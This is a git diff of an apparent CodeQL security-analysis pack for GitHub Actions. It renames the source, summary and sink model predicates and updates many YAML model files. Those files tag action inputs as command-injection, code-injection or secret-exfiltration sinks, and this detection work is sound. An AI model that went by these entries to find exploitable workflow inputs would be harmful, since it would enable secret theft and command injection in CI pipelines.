+- .../kotest_kotest.model.yml | 2 +- .../kubernetes_ingress-nginx.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 4 +- .../reusable-workflows/kumahq_kuma.model.yml | 2 +- .../labring_sealos.model.yml | 2 +- .../laion-ai_open-assistant.model.yml | 2 +- .../learningequality_kolibri.model.yml | 2 +- .../lensesio_stream-reactor.model.yml | 2 +- .../leptos-rs_leptos.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../liquibase_liquibase.model.yml | 2 +- .../litestar-org_litestar.model.yml | 2 +- .../reusable-workflows/llvm_circt.model.yml | 2 +- .../lnbits_lnbits.model.yml | 2 +- .../lutris_lutris.model.yml | 2 +- .../reusable-workflows/mailu_mailu.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- ...anticoresoftware_manticoresearch.model.yml | 2 +- .../marcelotduarte_cx_freeze.model.yml | 2 +- ...xaml_materialdesigninxamltoolkit.model.yml | 
2 +- .../matter-labs_zksync-era.model.yml | 2 +- .../mattermost_desktop.model.yml | 2 +- .../mattermost_mattermost.model.yml | 2 +- .../mealie-recipes_mealie.model.yml | 2 +- .../meshery_meshery.model.yml | 2 +- .../meshtastic_firmware.model.yml | 2 +- .../microcks_microcks.model.yml | 2 +- ...crosoft_applicationinsights-java.model.yml | 2 +- .../microsoft_chat-copilot.model.yml | 2 +- .../microsoft_msquic.model.yml | 2 +- .../microsoft_oryx.model.yml | 2 +- .../microsoft_pr-metrics.model.yml | 2 +- ...oft_react-native-windows-samples.model.yml | 2 +- .../microsoft_vscode-cpptools.model.yml | 2 +- .../moby_buildkit.model.yml | 2 +- .../reusable-workflows/moby_moby.model.yml | 2 +- .../mosaicml_composer.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mudler_localai.model.yml | 2 +- .../mustardchef_wsabuilds.model.yml | 2 +- .../reusable-workflows/n8n-io_n8n.model.yml | 2 +- .../napari_napari.model.yml | 2 +- .../reusable-workflows/nasa_fprime.model.yml | 2 +- .../nautobot_nautobot.model.yml | 2 +- .../reusable-workflows/nektos_act.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../neovim_neovim.model.yml | 2 +- .../nethermindeth_nethermind.model.yml | 2 +- .../newrelic_newrelic-dotnet-agent.model.yml | 2 +- .../newrelic_newrelic-java-agent.model.yml | 2 +- .../newrelic_node-newrelic.model.yml | 2 +- .../nexus-mods_nexusmods.app.model.yml | 2 +- .../nginxinc_kubernetes-ingress.model.yml | 2 +- .../nocodb_nocodb.model.yml | 2 +- .../reusable-workflows/novuhq_novu.model.yml | 2 +- .../npm_abbrev-js.model.yml | 2 +- .../reusable-workflows/npm_cli.model.yml | 2 +- .../npm_fs-minipass.model.yml | 2 +- .../npm_hosted-git-info.model.yml | 2 +- .../reusable-workflows/npm_ini.model.yml | 2 +- ...pm_json-parse-even-better-errors.model.yml | 2 +- .../npm_minify-registry-metadata.model.yml | 2 +- .../npm_mute-stream.model.yml | 2 +- .../npm_node-semver.model.yml | 2 +- .../npm_node-which.model.yml | 2 +- .../reusable-workflows/npm_nopt.model.yml | 2 +- 
.../npm_normalize-package-data.model.yml | 2 +- .../npm_write-file-atomic.model.yml | 2 +- .../onflow_cadence.model.yml | 2 +- .../open-goal_jak-project.model.yml | 2 +- ...pen-telemetry_opentelemetry-demo.model.yml | 2 +- ...try_opentelemetry-dotnet-contrib.model.yml | 2 +- ...n-telemetry_opentelemetry-dotnet.model.yml | 2 +- ...entelemetry-java-instrumentation.model.yml | 2 +- ...lemetry_opentelemetry-js-contrib.model.yml | 2 +- ...telemetry_opentelemetry-operator.model.yml | 2 +- .../openbao_openbao.model.yml | 2 +- .../openhab_openhab-docs.model.yml | 2 +- .../openmined_pysyft.model.yml | 2 +- .../opentofu_opentofu.model.yml | 2 +- .../openttd_openttd.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- .../reusable-workflows/openxla_iree.model.yml | 2 +- .../reusable-workflows/openzfs_zfs.model.yml | 2 +- ...ator-framework_java-operator-sdk.model.yml | 2 +- .../orange-opensource_hurl.model.yml | 2 +- ...aolosalvatori_servicebusexplorer.model.yml | 2 +- .../parcel-bundler_parcel.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../reusable-workflows/pcsx2_pcsx2.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../pixie-io_pixie.model.yml | 2 +- .../plantuml_plantuml.model.yml | 2 +- .../powerdns_pdns.model.yml | 2 +- .../preactjs_preact.model.yml | 2 +- .../prismlauncher_prismlauncher.model.yml | 2 +- .../product-os_flowzone.model.yml | 2 +- .../project-oak_oak.model.yml | 2 +- .../reusable-workflows/prql_prql.model.yml | 2 +- .../pulumi_pulumi.model.yml | 2 +- .../puppeteer_puppeteer.model.yml | 2 +- .../puppetlabs_puppetlabs-puppetdb.model.yml | 2 +- .../reusable-workflows/pyo3_maturin.model.yml | 2 +- .../reusable-workflows/pyo3_pyo3.model.yml | 2 +- .../python_cpython.model.yml | 2 +- .../pytorch_botorch.model.yml | 2 +- .../reusable-workflows/pytorch_xla.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../rancher_dashboard.model.yml | 2 +- 
.../rasterio_rasterio.model.yml | 2 +- .../redisearch_redisearch.model.yml | 2 +- .../remix-run_remix.model.yml | 2 +- .../rmcrackan_libation.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../ruby_ruby.wasm.model.yml | 2 +- .../rustdesk_rustdesk.model.yml | 2 +- .../saadeghi_daisyui.model.yml | 2 +- .../sagemath_sage.model.yml | 2 +- .../schemastore_schemastore.model.yml | 2 +- .../scikit-learn_scikit-learn.model.yml | 2 +- .../seleniumhq_selenium.model.yml | 2 +- .../shaka-project_shaka-packager.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- .../shimataro_ssh-key-action.model.yml | 2 +- .../softfever_orcaslicer.model.yml | 2 +- ...-mansion_react-native-reanimated.model.yml | 2 +- .../solana-labs_solana.model.yml | 2 +- .../sonarr_sonarr.model.yml | 2 +- .../speedb-io_speedb.model.yml | 2 +- ...ring-cloud_spring-cloud-dataflow.model.yml | 2 +- .../sqlfluff_sqlfluff.model.yml | 2 +- .../stdlib-js_stdlib.model.yml | 2 +- .../stereokit_stereokit.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 +- .../supabase_auth.model.yml | 2 +- .../reusable-workflows/supabase_cli.model.yml | 2 +- .../tencent_hippy.model.yml | 4 +- .../tgstation_tgstation.model.yml | 2 +- .../thesofproject_sof.model.yml | 2 +- .../tiann_kernelsu.model.yml | 2 +- .../tiledb-inc_tiledb.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../tracel-ai_burn.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../ubisoft_sharpmake.model.yml | 2 +- .../unity-technologies_ml-agents.model.yml | 2 +- .../reusable-workflows/urbit_urbit.model.yml | 2 +- .../uyuni-project_uyuni.model.yml | 2 +- .../vert-x3_vertx-hazelcast.model.yml | 2 +- .../reusable-workflows/vkcom_vkui.model.yml | 2 +- .../walletconnect_web3modal.model.yml | 2 +- .../warzone2100_warzone2100.model.yml | 2 +- .../wasmedge_wasmedge.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../reusable-workflows/werf_werf.model.yml | 2 +- .../widdix_aws-cf-templates.model.yml | 2 +- 
.../wildfly_wildfly.model.yml | 2 +- .../yt-dlp_yt-dlp.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../zephyrproject-rtos_zephyr.model.yml | 2 +- .../zitadel_zitadel.model.yml | 4 +- ql/lib/ext/getsentry_action-release.model.yml | 2 +- ql/lib/ext/github_codeql-action.model.yml | 2 +- .../ext/go-semantic-release_action.model.yml | 2 +- .../golangci_golangci-lint-action.model.yml | 2 +- .../ext/gonuit_heroku-docker-deploy.model.yml | 2 +- .../goreleaser_goreleaser-action.model.yml | 2 +- ...te-or-update-pull-request-action.model.yml | 2 +- .../ext/gradle_gradle-build-action.model.yml | 2 +- ql/lib/ext/haya14busa_action-cond.model.yml | 2 +- ql/lib/ext/hexlet_project-action.model.yml | 2 +- ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 2 +- ql/lib/ext/ilammy_setup-nasm.model.yml | 2 +- ql/lib/ext/imjohnbo_issue-bot.model.yml | 2 +- ql/lib/ext/iterative_setup-cml.model.yml | 2 +- ql/lib/ext/iterative_setup-dvc.model.yml | 2 +- ...sives_github-pages-deploy-action.model.yml | 2 +- .../ext/jitterbit_get-changed-files.model.yml | 2 +- .../ext/johnnymorganz_stylua-action.model.yml | 2 +- ql/lib/ext/jsdaniell_create-json.model.yml | 2 +- .../ext/jurplel_install-qt-action.model.yml | 2 +- ql/lib/ext/jwalton_gh-ecr-push.model.yml | 4 +- ...han_pull-request-comment-trigger.model.yml | 2 +- ...leci-artifacts-redirector-action.model.yml | 2 +- ql/lib/ext/leafo_gh-actions-lua.model.yml | 2 +- .../ext/leafo_gh-actions-luarocks.model.yml | 2 +- .../lucasbento_auto-close-issues.model.yml | 2 +- ..._actions-find-and-replace-string.model.yml | 2 +- ql/lib/ext/magefile_mage-action.model.yml | 2 +- ql/lib/ext/maierj_fastlane-action.model.yml | 2 +- .../manusa_actions-setup-minikube.model.yml | 2 +- ql/lib/ext/marocchino_on_artifact.model.yml | 2 +- ql/lib/ext/mattdavis0351_actions.model.yml | 4 +- .../ext/meteorengineer_setup-meteor.model.yml | 2 +- ...tro-digital_setup-tools-for-waas.model.yml | 2 +- ql/lib/ext/microsoft_setup-msbuild.model.yml | 2 +- 
...mishakav_pytest-coverage-comment.model.yml | 2 +- ...hers-excellent_docker-build-push.model.yml | 2 +- ql/lib/ext/msys2_setup-msys2.model.yml | 2 +- ql/lib/ext/mxschmitt_action-tmate.model.yml | 2 +- ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 4 +- .../ext/nanasess_setup-chromedriver.model.yml | 2 +- ql/lib/ext/nanasess_setup-php.model.yml | 2 +- ql/lib/ext/nick-fields_retry.model.yml | 2 +- ql/lib/ext/octokit_graphql-action.model.yml | 2 +- ql/lib/ext/octokit_request-action.model.yml | 2 +- ql/lib/ext/olafurpg_setup-scala.model.yml | 2 +- .../paambaati_codeclimate-action.model.yml | 2 +- .../peter-evans_create-pull-request.model.yml | 2 +- ...-murray_issue-body-parser-action.model.yml | 2 +- .../ext/plasmicapp_plasmic-action.model.yml | 2 +- .../preactjs_compressed-size-action.model.yml | 2 +- ql/lib/ext/py-actions_flake8.model.yml | 2 +- ...py-actions_py-dependency-install.model.yml | 2 +- ql/lib/ext/pyo3_maturin-action.model.yml | 2 +- ...vecircus_android-emulator-runner.model.yml | 2 +- ...bers-in-action_download-artifact.model.yml | 2 +- ql/lib/ext/reggionick_s3-deploy.model.yml | 2 +- .../ext/renovatebot_github-action.model.yml | 2 +- .../ext/roots_issue-closer-action.model.yml | 2 +- ql/lib/ext/ros-tooling_setup-ros.model.yml | 2 +- ql/lib/ext/ruby_setup-ruby.model.yml | 4 +- ...ction-detect-and-tag-new-version.model.yml | 4 +- ql/lib/ext/sergeysova_jq-action.model.yml | 2 +- ...shallwefootball_upload-s3-action.model.yml | 2 +- .../shogo82148_actions-setup-perl.model.yml | 2 +- ...skitionek_notify-microsoft-teams.model.yml | 2 +- ql/lib/ext/snow-actions_eclint.model.yml | 2 +- .../ext/stackhawk_hawkscan-action.model.yml | 2 +- .../ext/step-security_harden-runner.model.yml | 2 +- .../suisei-cn_actions-download-file.model.yml | 2 +- ql/lib/ext/tibdex_backport.model.yml | 2 +- ql/lib/ext/timheuer_base64-to-file.model.yml | 2 +- ql/lib/ext/tj-actions_branch-names.model.yml | 2 +- .../ext/trilom_file-changes-action.model.yml | 2 +- 
...ss_conventional-changelog-action.model.yml | 2 +- .../tryghost_action-deploy-theme.model.yml | 2 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- ql/lib/ext/veracode_veracode-sca.model.yml | 2 +- .../ext/wearerequired_lint-action.model.yml | 2 +- ql/lib/ext/webfactory_ssh-agent.model.yml | 2 +- .../xt0rted_slash-command-action.model.yml | 2 +- ql/lib/ext/zaproxy_action-baseline.model.yml | 2 +- ql/lib/ext/zaproxy_action-full-scan.model.yml | 2 +- ql/lib/qlpack.gbo | 13 --- ql/lib/qlpack.yml | 15 ++-- ql/lib/yaml.dbscheme | 80 ------------------- ql/lib/yaml.dbscheme.stats | 4 - ql/src/codeql-pack.lock.yml | 6 ++ ql/src/qlpack.yml | 7 +- ql/test/codeql-pack.lock.yml | 6 ++ ql/test/library-tests/test.ql | 4 +- ql/test/qlpack.yml | 6 +- 755 files changed, 819 insertions(+), 898 deletions(-) create mode 100644 .!79690!.DS_Store delete mode 100644 ql/lib/qlpack.gbo delete mode 100644 ql/lib/yaml.dbscheme delete mode 100644 ql/lib/yaml.dbscheme.stats diff --git a/.!79690!.DS_Store b/.!79690!.DS_Store new file mode 100644 index 000000000000..e69de29bb2d1 diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 84a6ccba26dc..c060ce974300 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -2,15 +2,25 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 0.1.16 codeql/dataflow: - version: 0.1.8 + version: 0.2.7 + codeql/javascript-all: + version: 0.9.1 + codeql/mad: + version: 0.2.16 + codeql/regex: + version: 0.2.16 codeql/ssa: - version: 0.2.8 + version: 0.2.16 + codeql/tutorial: + version: 0.2.16 codeql/typetracking: - version: 0.2.8 + version: 0.2.16 codeql/util: - version: 0.2.8 + version: 0.2.16 + codeql/xml: + version: 0.0.3 codeql/yaml: - version: 0.1.5 + version: 0.2.16 compiled: false diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index c46a3ee64a1f..d0b84f918d59 100644 
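Review bot: The `diff --git a/.!79690!.DS_Store b/.!79690!.DS_Store` section (`new file mode 100644`, blob `e69de29bb2d1`, i.e. empty) commits a file named `.!79690!.DS_Store`, which looks like a macOS Finder metadata artifact left behind by a sync or copy tool rather than anything the pack needs. It should be dropped from the commit before merge, since it adds noise to the tree and sets a precedent for other editor and OS artifacts slipping into the repository. An ignore pattern that matches the suffix, such as `*.DS_Store`, rather than only the literal filename would keep variants like this one from being picked up again.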
--- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -55,8 +55,8 @@ predicate externallyTriggerableEventsDataModel(string event) { * - output arg: To node (prefixed with either `env.` or `output.`) * - provenance: verification of the model */ -predicate sourceModel(string action, string version, string output, string kind, string provenance) { - Extensions::sourceModel(action, version, output, kind, provenance) +predicate actionsSourceModel(string action, string version, string output, string kind, string provenance) { + Extensions::actionsSourceModel(action, version, output, kind, provenance) } /** @@ -69,10 +69,10 @@ predicate sourceModel(string action, string version, string output, string kind, * - kind: Either 'Taint' or 'Value' * - provenance: verification of the model */ -predicate summaryModel( +predicate actionsSummaryModel( string action, string version, string input, string output, string kind, string provenance ) { - Extensions::summaryModel(action, version, input, output, kind, provenance) + Extensions::actionsSummaryModel(action, version, input, output, kind, provenance) } /** @@ -84,13 +84,13 @@ predicate summaryModel( * - kind: sink kind * - provenance: verification of the model */ -predicate sinkModel(string action, string version, string input, string kind, string provenance) { - Extensions::sinkModel(action, version, input, kind, provenance) +predicate actionsSinkModel(string action, string version, string input, string kind, string provenance) { + Extensions::actionsSinkModel(action, version, input, kind, provenance) } predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { exists(Uses uses, string action, string version, string kind | - sourceModel(action, version, fieldName, kind, _) and + actionsSourceModel(action, version, fieldName, kind, _) and uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" 
@@ -113,7 +113,7 @@ predicate externallyDefinedStoreStep( DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c ) { exists(Uses uses, string action, string version, string input, string output | - summaryModel(action, version, input, output, "taint", _) and + actionsSummaryModel(action, version, input, output, "taint", _) and c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and ( @@ -135,7 +135,7 @@ predicate externallyDefinedStoreStep( predicate externallyDefinedSink(DataFlow::Node sink, string kind) { exists(Uses uses, string action, string version, string input | - sinkModel(action, version, input, kind, _) and + actionsSinkModel(action, version, input, kind, _) and uses.getCallee() = action.toLowerCase() and ( if input.trim().matches("env.%") diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 6c64b72e6b4c..05f71cfc0be6 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -5,21 +5,21 @@ /** * Holds if a source model exists for the given parameters. */ -extensible predicate sourceModel( +extensible predicate actionsSourceModel( string action, string version, string output, string kind, string provenance ); /** * Holds if a summary model exists for the given parameters. */ -extensible predicate summaryModel( +extensible predicate actionsSummaryModel( string action, string version, string input, string output, string kind, string provenance ); /** * Holds if a sink model exists for the given parameters. */ -extensible predicate sinkModel( +extensible predicate actionsSinkModel( string action, string version, string input, string kind, string provenance ); 
diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml index 67455900ec36..b897e8f2c5a4 100644 --- a/ql/lib/ext/8398a7_action-slack.model.yml +++ b/ql/lib/ext/8398a7_action-slack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml index 0220f0d54d84..3a5b34880b95 100644 --- a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml +++ b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"] diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index 9b36680af8f0..20abd5328727 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/github-script", "*", "input.script", "code-injection", "manual"] diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index fe3c3e58b5f9..dcc20433483f 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"] - ["ahmadnassri/action-changed-files", "*", "output.json", "json", "manual"] diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index 41b67c2a625d..3afd9991e073 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"] - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection", "manual"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml index 4d12a2936969..3deae2a9f197 100644 --- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"] diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml index 7cb2e10e9267..7dd0459ab7f9 100644 --- a/ql/lib/ext/anchore_sbom-action.model.yml +++ b/ql/lib/ext/anchore_sbom-action.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"] - ["anchore/sbom-action", "*", "input.format", "command-injection", "manual"] diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml index 83f09bc6bde5..721042aafaf0 100644 --- a/ql/lib/ext/anchore_scan-action.model.yml +++ b/ql/lib/ext/anchore_scan-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"] diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml index bdd8a8f77c9b..ee4dbaf2b55e 100644 --- a/ql/lib/ext/andresz1_size-limit-action.model.yml +++ b/ql/lib/ext/andresz1_size-limit-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"] - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection", "manual"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml index 7e5f5c9ee6a4..76ae920d2550 100644 --- a/ql/lib/ext/android-actions_setup-android.model.yml +++ b/ql/lib/ext/android-actions_setup-android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"] 
diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml index 8daa9a9c2b33..46f667d75a01 100644 --- a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml +++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"] diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml index 80502e487b83..4df6fe61a43f 100644 --- a/ql/lib/ext/asdf-vm_actions.model.yml +++ b/ql/lib/ext/asdf-vm_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml index 2a26d31feac7..aab329160ea1 100644 --- a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml index 82e81f558166..610d188f0655 100644 --- a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"] - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml index 58554eb3f612..b571bded8ca8 100644 --- a/ql/lib/ext/aszc_change-string-case-action.model.yml +++ b/ql/lib/ext/aszc_change-string-case-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"] - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint", "manual"] diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml index ca99210b4c2a..cd8f4f73e498 100644 --- a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml +++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"] - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint", "manual"] diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml index 1563d95b0b14..6ebc3875e07b 100644 --- a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml +++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"] - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection", "manual"] diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml index 2bb6000355d6..2b2dbd014b7f 100644 --- a/ql/lib/ext/azure_powershell.model.yml +++ b/ql/lib/ext/azure_powershell.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml index b0c3419abe93..78b7eb1394c2 100644 --- a/ql/lib/ext/bahmutov_npm-install.model.yml +++ b/ql/lib/ext/bahmutov_npm-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"] diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml index cbe593690e44..0f146da2e0cb 100644 --- a/ql/lib/ext/blackducksoftware_github-action.model.yml +++ b/ql/lib/ext/blackducksoftware_github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"] - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection", "manual"] diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml index f29355d48827..483a3bf51727 100644 
--- a/ql/lib/ext/bobheadxi_deployments.model.yml +++ b/ql/lib/ext/bobheadxi_deployments.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index 8463ed9577b4..e06e75f7a3bf 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"] - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection", "manual"] diff --git 